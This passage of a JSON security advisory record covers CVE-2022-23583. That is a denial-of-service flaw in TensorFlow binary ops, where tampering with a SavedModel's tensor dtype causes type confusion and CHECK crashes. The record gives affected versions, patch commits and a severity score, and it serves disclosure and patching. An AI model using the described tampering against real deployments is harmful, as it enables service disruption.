"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.7.0"
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-cpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.7.0"
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.6.0"
},
{
"fixed": "2.6.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "tensorflow-gpu"
},
"ranges": [
{
"events": [
{
"introduced": "2.7.0"
},
{
"fixed": "2.7.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"2.7.0"
]
}
],
"aliases": [
"CVE-2022-23583"
],
"database_specific": {
"cwe_ids": [
"CWE-617",
"CWE-843"
],
"github_reviewed": true,
"github_reviewed_at": "2022-02-04T19:45:57Z",
"nvd_published_at": "2022-02-04T23:15:00Z",
"severity": "MODERATE"
},
"details": "### Impact\nA malicious user can cause a denial of service by altering a `SavedModel` such that [any binary op](https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/kernels/cwise_ops_common.h#L88-L137) would trigger `CHECK` failures. This occurs when the protobuf part corresponding to the tensor arguments is modified such that the `dtype` no longer matches the `dtype` expected by the op. In that case, calling the templated binary operator for the binary op would receive corrupted data, due to the type confusion involved:\n\n```cc\nfunctor::BinaryFunctor\u003cDevice, Functor, 1\u003e()(\n eigen_device, out-\u003etemplate flat\u003cTout\u003e(),\n input_0.template flat\u003cTin\u003e(), input_1.template flat\u003cTin\u003e(),\n error_ptr);\n```\nIf `Tin` and `Tout` don\u0027t match the type of data in `out` and `input_*` tensors then `flat\u003c*\u003e` would interpret it wrongly. In most cases, this would be a silent failure, but we have noticed scenarios where this results in a `CHECK` crash, hence a denial of service.\n\n### Patches\nWe have patched the issue in GitHub commit [a7c02f1a9bbc35473969618a09ee5f9f5d3e52d9](https://github.com/tensorflow/tensorflow/commit/a7c02f1a9bbc35473969618a09ee5f9f5d3e52d9).\nThe fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.",
"id": "GHSA-gjqc-q9g6-q2j3",
"modified": "2024-11-07T22:28:14Z",
"published": "2022-02-10T00:34:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gjqc-q9g6-q2j3"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23583"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/commit/a7c02f1a9bbc35473969618a09ee5f9f5d3e52d9"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2022-92.yaml"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2022-147.yaml"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow"
},
{
"type": "WEB",
"url": "https://github.com/tensorflow/tensorflow/blob/a1320ec1eac186da1d03f033109191f715b2b130/tensorflow/core/kernels/cwise_ops_common.h#L88-L137"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "`CHECK`-failures in binary ops in Tensorflow"
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.